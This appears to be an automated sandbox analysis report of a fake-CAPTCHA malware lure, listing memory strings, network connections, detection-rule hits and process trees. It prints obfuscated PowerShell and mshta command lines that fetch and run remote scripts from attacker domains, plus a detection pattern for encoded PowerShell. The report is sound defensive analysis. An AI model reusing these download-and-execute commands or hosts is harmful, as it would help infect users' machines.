00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp47
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp49280-654d-44b7-add6-a7ba0821d64d:
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4G
Source: mshta.exe, 00000002.00000002.1895547199.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1875575722.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1879974812.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878062600.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4LMEMX
Source: mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4RRC:
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4Y
Source: mshta.exe, 00000002.00000003.1888626567.000001F822FF6000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4https://deduhko2.kliphuwatey.shop/Poket.mp4
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6E0000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4n
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://deduhko2.kliphuwatey.shop/Px&
Source: svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr: String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr: String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr: String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr: String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr: String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr: String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr: String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000000.00000002.1667002839.0000018B80530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://solve.vw
Source: powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwX
Source: mshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/R
Source: mshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/Z
Source: mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp, 1.ps1: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
Source: mshta.exe, 00000002.00000002.1893706123.000001F01B476000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d.
Source: mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dC:
Source: mshta.exe, 00000002.00000002.1893645402.000001F01B3F0000.00000004.00000800.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dH
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dP
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dS
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dV
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dh
Source: mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dl
Source: mshta.exe, 00000002.00000002.1894016581.000001F01B6A0000.00000004.00000020.00020000.00000000.sdmp: String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlorerY)
Source: unknown: Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown: Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown: Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown: Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown: Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown: Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown: HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown: HTTPS traffic detected: 172.67.144.62:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown: HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2

System Summary

Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR: Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\svchost.exe: File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Code function: 4_2_00007FFD9B12AF02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Code function: 4_2_00007FFD9B129D56
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Code function: 4_2_00007FFD9B123EA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Code function: 4_2_00007FFD9B1F38D4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Code function: 6_2_0076BA40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Code function: 6_2_00761D78
Source: C:\Windows\System32\mshta.exe: Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe: Process created: Commandline size = 5045
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR: Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine: Classification label: mal84.evad.winPS1@11/15@3/3
Source: C:\Windows\System32\mshta.exe: File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Mutant created: NULL
Source: C:\Windows\System32\conhost.exe: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exe: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rx3j10ix.n01.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: powershell.exe: String found in binary or memory: mshta https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d # ?? ''I am not a robot - reCAPTCHA Verification ID: 4885''$global:?
Source: unknown: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
Source: unknown: Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe: Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe: Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe: Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe: Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe: Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
